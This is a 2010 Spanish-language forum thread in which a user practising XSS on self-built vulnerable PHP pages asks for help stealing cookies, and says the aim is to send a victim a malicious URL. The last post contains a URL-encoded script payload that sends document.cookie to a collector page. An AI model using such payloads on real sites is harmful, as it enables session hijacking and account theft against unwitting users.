Título: duda xss Publicado por: Dr [F] en 24 Julio 2010, 08:55 am Hola gente del foro, estaba en casa intentando practicar xss leyendo tutoriales, pero no me sale :S
miren hize unas paginas vulnerables, pero me sigue sin salir: pagina: pindex.php Código: <?php buscador.php Código: <?php cookies.php Código: <? y esta es la url que mando: Código: http://localhost/buscador.php?palabrita= el problema es que no me crea el archivo archivo.txt :S alguien sabe a que se debe.. ? gracias Título: Re: duda xss Publicado por: ~ Yoya ~ en 24 Julio 2010, 19:34 pm aprende php, lo unico vulnerable es el pindex.php
Título: Re: duda xss Publicado por: Dr [F] en 24 Julio 2010, 19:51 pm es que no se que estoy haciendo mal -.-"
Título: Re: duda xss Publicado por: ~ Yoya ~ en 25 Julio 2010, 01:23 am No es necesario enviar el valor como una Cookie...
Puede ser que el servidor tenga la directiva magic_quotes_gpc On y te escape las comillas simples y dobles de los valores que se envian via Get, Post o Cookie... Prueba con este Código
Título: Re: duda xss Publicado por: Dr [F] en 25 Julio 2010, 07:56 am sigue sin salirme, sinceramente no se que estoy haciendo mal :S :-[
Título: Re: duda xss Publicado por: Erfiug en 25 Julio 2010, 16:39 pm Que nevegador utilizas? Algunos como IE8 tienen protecciones anti XSS que no permiten acceder directamente a la variable document.cookie
Título: Re: duda xss Publicado por: Dr [F] en 25 Julio 2010, 21:22 pm sisi :) utilizo mozilla 3.6 miren me quede toda la noche ayer y logre obtener una fucking cookie..
les dejo los codigos :) Código: <?php buscador.php Código: <?php lasla.php Código:
el problema es el siguiente, yo quiero mandar una url a la victima y que sus cookies de esa pagina vulnerable se envien a mi, pero no se que url "maliciosa" mandar... me entienden ? ya que si mando estO: Código: <script><a me guarda en la cookie lo siguiente: Código: token=8c610b4ae58115e366123efd8e7b7accd7ba525a2207acc6; u=fra; c=a1305ca10f94f2340770c73e26d427588f236709; user=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Flocalhost%2Flalsa.php%3Fcookie%3D%27 escape%28document.cookie%29%3B%3C%2Fscript%3E; y ahi no me esta guardando ningun usuario solo lo que puse acontinuacion de la variable palabrita :s muchas gracias |